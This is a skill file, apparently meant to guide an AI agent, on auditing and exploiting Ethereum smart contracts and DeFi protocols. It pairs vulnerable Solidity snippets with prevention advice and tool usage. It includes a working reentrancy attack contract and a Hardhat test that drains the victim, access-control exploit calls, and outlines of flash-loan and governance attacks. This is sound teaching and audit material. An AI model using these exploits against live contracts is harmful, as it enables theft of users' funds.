gh-trilwu-secskills-secskills/skills/web3-blockchain/SKILL.md

---
name: exploiting-web3-smart-contracts
description: Audit and exploit smart contracts and Web3 applications including reentrancy, integer overflow, access control flaws, and DeFi-specific vulnerabilities. Use when testing blockchain applications or performing smart contract audits.
---

# Exploiting Web3 and Smart Contracts

## When to Use

- Smart contract security auditing
- DeFi protocol testing
- Web3 application pentesting
- Blockchain vulnerability assessment
- NFT platform security

## Environment Setup

**Install Tools:**
```bash
# Node.js and npm
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
sudo apt install -y nodejs

# Hardhat (Ethereum development)
npm install --save-dev hardhat

# Foundry (Rust-based toolkit)
curl -L https://foundry.paradigm.xyz | bash
foundryup

# Slither (static analysis)
pip3 install slither-analyzer

# Mythril (security analysis)
pip3 install mythril
```

**Connect to Networks:**
```javascript
// Ethereum Mainnet via Infura
const Web3 = require('web3');
const web3 = new Web3('https://mainnet.infura.io/v3/YOUR_KEY');

// Local development (Hardhat/Ganache)
const web3 = new Web3('http://127.0.0.1:8545');
```

## Common Smart Contract Vulnerabilities

### 1. Reentrancy

**Vulnerable Contract:**
```solidity
contract Vulnerable {
    mapping(address => uint) public balances;

    function withdraw() public {
        uint amount = balances[msg.sender];
        // Vulnerable: external call before state update
        (bool success,) = msg.sender.call{value: amount}("");
        require(success);
        balances[msg.sender] = 0;  // State update after call
    }
}
```

**Exploit:**
```solidity
contract Attack {
    Vulnerable victim;

    constructor(address _victim) {
        victim = Vulnerable(_victim);
    }

    function attack() public payable {
        victim.deposit{value: 1 ether}();
        victim.withdraw();
    }

    fallback() external payable {
        if (address(victim).balance >= 1 ether) {
            victim.withdraw();  // Reenter
        }
    }
}
```

**Prevention:**
- Checks-Effects-Interactions pattern
- ReentrancyGuard modifier
- Use transfer() instead of call()

### 2. Integer Overflow/Underflow

**Vulnerable (Solidity < 0.8.0):**
```solidity
function transfer(address _to, uint256 _value) public {
    require(balances[msg.sender] - _value >= 0);  // Can underflow
    balances[msg.sender] -= _value;
    balances[_to] += _value;  // Can overflow
}
```

**Exploit:**
```solidity
// Send more tokens than you have
// balances[msg.sender] = 1
// _value = 2
// 1 - 2 = 2^256 - 1 (underflow)
```

**Prevention:**
- Use Solidity >= 0.8.0 (automatic checks)
- Use SafeMath library
- Manual overflow checks

### 3. Access Control Issues

**Vulnerable:**
```solidity
function withdraw() public {
    // Missing access control!
    msg.sender.transfer(address(this).balance);
}

function setOwner(address _owner) public {
    owner = _owner;  // Anyone can become owner
}
```

**Exploit:**
```javascript
// Call withdraw from any address
await contract.withdraw();

// Become owner
await contract.setOwner(attackerAddress);
```

**Prevention:**
```solidity
modifier onlyOwner() {
    require(msg.sender == owner, "Not owner");
    _;
}

function withdraw() public onlyOwner {
    msg.sender.transfer(address(this).balance);
}
```

### 4. Unchecked External Calls

**Vulnerable:**
```solidity
function callExternal(address target) public {
    target.call("");  // Return value not checked
}

function sendEther(address payable recipient) public {
    recipient.send(1 ether);  // Silently fails if send() returns false
}
```

**Prevention:**
```solidity
(bool success,) = target.call("");
require(success, "Call failed");
```

### 5. Delegatecall Injection

**Vulnerable:**
```solidity
function forward(address _target, bytes memory _data) public {
    _target.delegatecall(_data);  // Executes in contract's context
}
```

**Exploit:**
```solidity
// Attacker can modify contract storage
// Call selfdestruct()
// Change owner
```

**Prevention:**
- Avoid delegatecall to user-controlled addresses
- Whitelist allowed targets
- Use libraries instead

### 6. Front-Running / MEV

**Scenario:**
```solidity
// DEX swap at specific price
function swap(uint256 amountIn) public {
    uint256 amountOut = getAmountOut(amountIn);
    // Attacker sees this in mempool
    // Submits transaction with higher gas to execute first
    // Changes the price before victim's tx
}
```

**MEV Attacks:**
- Front-running
- Back-running
- Sandwich attacks
- Liquidations
- Arbitrage

**Mitigation:**
- Commit-reveal schemes
- Private mempools (Flashbots)
- Slippage protection
- Minimal on-chain disclosure

### 7. Price Oracle Manipulation

**Vulnerable:**
```solidity
// Using single DEX as price source
function getPrice() public view returns (uint256) {
    return uniswapPair.getReserves();
}
```

**Exploit:**
```solidity
// Flash loan attack
// 1. Borrow large amount
// 2. Manipulate DEX price
// 3. Interact with vulnerable contract
// 4. Repay flash loan
// 5. Profit
```

**Prevention:**
- Use time-weighted average price (TWAP)
- Multiple oracle sources (Chainlink)
- Delay price updates
- Min/max price bounds

### 8. Denial of Service

**Vulnerable:**
```solidity
function distribute() public {
    for (uint i = 0; i < users.length; i++) {
        users[i].transfer(amount);  // Can run out of gas
    }
}

function withdraw() public {
    // Winner takes all
    require(msg.sender == topBidder);
    msg.sender.transfer(address(this).balance);
}
```

**Exploit:**
- Create contract that rejects ether (reverts in fallback)
- Become topBidder
- Prevent anyone from winning

**Prevention:**
- Pull over push pattern
- Gas limits
- Emergency stop mechanisms

## Auditing Tools

### Static Analysis

**Slither:**
```bash
# Analyze contract
slither contract.sol

# Specific detectors
slither contract.sol --detect reentrancy-eth,tx-origin

# Generate report
slither contract.sol --json output.json

# Common detectors:
# - reentrancy-eth
# - uninitialized-state
# - tx-origin
# - unchecked-transfer
# - arbitrary-send
```

**Mythril:**
```bash
# Analyze with Mythril
myth analyze contract.sol

# Specify contract
myth analyze contract.sol:ContractName

# Graph generation
myth analyze contract.sol --graph output.html
```

**Securify:**
```bash
# Online tool
# https://securify.chainsecurity.com/
```

### Dynamic Analysis

**Echidna (Fuzzer):**
```bash
# Install
docker pull trailofbits/echidna

# Run fuzzer
echidna-test contract.sol --contract ContractName
```

**Manticore (Symbolic Execution):**
```bash
# Install
pip3 install manticore

# Analyze
manticore contract.sol
```

### Testing Frameworks

**Hardhat:**
```javascript
const { expect } = require("chai");

describe("Token", function () {
  it("Should exploit reentrancy", async function () {
    const [owner, attacker] = await ethers.getSigners();

    const Vulnerable = await ethers.getContractFactory("Vulnerable");
    const vulnerable = await Vulnerable.deploy();

    const Attack = await ethers.getContractFactory("Attack");
    const attack = await Attack.deploy(vulnerable.address);

    // Exploit
    await attack.attack({ value: ethers.utils.parseEther("1.0") });

    // Verify
    expect(await ethers.provider.getBalance(vulnerable.address)).to.equal(0);
  });
});
```

**Foundry:**
```solidity
// test/Exploit.t.sol
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "../src/Vulnerable.sol";

contract ExploitTest is Test {
    Vulnerable public vulnerable;

    function setUp() public {
        vulnerable = new Vulnerable();
    }

    function testExploit() public {
        // Test exploit
    }
}
```

```bash
# Run tests
forge test
forge test --match-contract ExploitTest -vvv
```

## DeFi-Specific Attacks

### Flash Loan Attack

```solidity
interface IFlashLoan {
    function flashLoan(uint256 amount) external;
}

contract FlashLoanExploit {
    function exploit() external {
        // 1. Borrow flash loan
        IFlashLoan(lender).flashLoan(1000000 ether);
    }

    function executeOperation(uint256 amount) external {
        // 2. Manipulate price oracle
        // 3. Exploit vulnerable contract
        // 4. Repay flash loan + fee
        // 5. Keep profit
    }
}
```

### Impermanent Loss Exploitation

- Manipulate pool ratios
- Extract value from liquidity providers
- Arbitrage price differences

### Governance Attacks

```solidity
// Flash loan to get voting power
// Vote on malicious proposal
// Execute immediately
// Repay loan
```

## Web3 Frontend Vulnerabilities

**Wallet Connection:**
```javascript
// Vulnerable: No signature verification
const signature = await signer.signMessage(message);
// Attacker can replay signature

// Secure: Include nonce and timestamp
const message = `Nonce: ${nonce}\nTimestamp: ${timestamp}`;
```

**Transaction Simulation:**
```javascript
// Before sending transaction
const result = await contract.callStatic.functionName(args);
// Verify expected outcome
```

## Blockchain Forensics

**Etherscan API:**
```bash
# Get contract source
curl "https://api.etherscan.io/api?module=contract&action=getsourcecode&address=0x..."

# Get transactions
curl "https://api.etherscan.io/api?module=account&action=txlist&address=0x..."
```

**Transaction Analysis:**
```javascript
// Get transaction
const tx = await web3.eth.getTransaction(txHash);

// Get receipt
const receipt = await web3.eth.getTransactionReceipt(txHash);

// Decode input data
const decoded = contract.interface.parseTransaction({ data: tx.input });
```

**Event Monitoring:**
```javascript
// Listen for events
contract.on("Transfer", (from, to, amount) => {
    console.log(`Transfer: ${from} -> ${to}: ${amount}`);
});

// Past events
const events = await contract.queryFilter("Transfer", fromBlock, toBlock);
```

## NFT-Specific Vulnerabilities

**Metadata Manipulation:**
- Centralized metadata storage
- Mutable tokenURI
- IPFS pinning issues

**Minting Exploits:**
```solidity
// Reentrancy in minting
function mint() external payable {
    require(msg.value == price);
    (bool success,) = owner.call{value: msg.value}("");  // Vulnerable
    _mint(msg.sender, tokenId++);
}
```

**Royalty Bypass:**
- Direct NFT transfers
- Bypassing marketplace fees
- Washing trades

## Testing on Mainnet Fork

**Hardhat:**
```javascript
// hardhat.config.js
module.exports = {
  networks: {
    hardhat: {
      forking: {
        url: "https://eth-mainnet.alchemyapi.io/v2/YOUR_KEY",
        blockNumber: 14000000
      }
    }
  }
};
```

**Foundry:**
```bash
# Fork mainnet
forge test --fork-url https://eth-mainnet.alchemyapi.io/v2/YOUR_KEY

# Specific block
forge test --fork-url https://... --fork-block-number 14000000
```

## Tools Summary

**Analysis:**
- Slither - Static analyzer
- Mythril - Security scanner
- Manticore - Symbolic execution
- Echidna - Fuzzer

**Development:**
- Hardhat - Development environment
- Foundry - Rust-based toolkit
- Remix - Online IDE
- Truffle - Development framework

**Monitoring:**
- Etherscan - Block explorer
- Tenderly - Debugging platform
- OpenZeppelin Defender - Security monitoring

## Security Best Practices

1. **Use latest Solidity** (>= 0.8.0)
2. **Follow** Checks-Effects-Interactions pattern
3. **Limit** external calls
4. **Validate** all inputs
5. **Use** established libraries (OpenZeppelin)
6. **Implement** access control
7. **Add** emergency pause
8. **Get** professional audits
9. **Use** testnets extensively
10. **Monitor** contracts post-deployment

## References

- https://book.hacktricks.xyz/blockchain
- https://consensys.github.io/smart-contract-best-practices/
- https://github.com/crytic/building-secure-contracts
- https://github.com/OpenZeppelin/openzeppelin-contracts
- https://ethernaut.openzeppelin.com/ (CTF)